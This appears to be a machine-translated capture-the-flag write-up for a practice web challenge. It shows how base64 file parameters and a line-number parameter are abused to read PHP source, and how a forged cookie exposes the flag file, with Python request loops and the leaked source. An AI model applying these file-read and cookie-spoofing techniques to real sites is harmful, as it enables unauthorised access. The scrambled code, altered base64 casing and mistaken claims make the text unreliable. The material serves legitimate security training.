Read Catalogue
Topics
Back to TopAnalysis
Open the link to the topic, the page content is a string of non-readable and very long strings.
Looks like a MD5 value (never seen such a long MD5)
See the URL Address bar link, more than two parameters "line" and "file". All know that the delivery of URL parameters is Base64 encoded
" Line " value is empty " file " value is ZMXHZY50EHQ
Decode the "file" value "Zmxhzy50ehq" in Python (I am a novice python, so I do not rely on other online decoding tools!). DIY, clothed)
Decoding actually failed.
Google.. Query (base one or two bits may have "=")
Get the result "flag.txt"
Guess there is a file containing the vulnerability, try to change the value of "file" to "index.php" Base64 encoded value access, the Web page is blank.
It says "line" value is empty, now try to change the value of "lines", enter 1 to get a row of code
After several attempts to find "line" up to 18, with Python crawl the contents of the file, starting from 0 to traverse
#coding: utf-8# idf# Author:vforboximport requests for in range (0,19 ): "http://ctf.idf.cn/game/web/40/index.php?line="" &FILE=AW5KZXGUCGHW " = requests. Get (URL) = response.text Print content
Get the content that's the index.php code
<?php error_reporting (0); $file=base64_decode (Isset ($_get['file'])? $_get['file']:""); $line=isset ($_get[' Line'])? Intval ($_get[' Line']):0; if($file = ="') Header ("LOCATION:INDEX.PHP?LINE=&FILE=ZMXHZY50EHQ"); $file _list=Array ('0'='Flag.txt', '1'='index.php', ); if(Isset ($_cookie['Key']) && $_cookie['Key']=='IDF') {$file _list[2]='flag.php'; } if(In_array ($file, $file _list)) {$fa=file ($file); echo $fa [$line]; }?>
From the index.php code, you can find that the cookie is named key and the value is IDF
Set the value of "file" to "Zmxhzy50ehq" (Flag.txt's base64 code) to access flag.php files in a cookie-spoofed manner
Still traversing "line", the Python script is as follows
#coding: utf-8# Idf#author:vforboximport Requestscookies={'Key':'IDF'} # Set the value of the cookie to IDF forIinchRange0, +): URL="http://ctf.idf.cn/game/web/40/index.php?line="+str (i) +"&file=zmxhzy5waha"Response= requests.Get(url,cookies=cookies) Content=response.text Print Content
Get Password: Wctf{idf_c00kie}
Back to TopSummary
Focus is the idea, the idea of what's wrong with the place, please master don't expose me
Back to Top
IDF Lab: Dragnet--cookie Cheat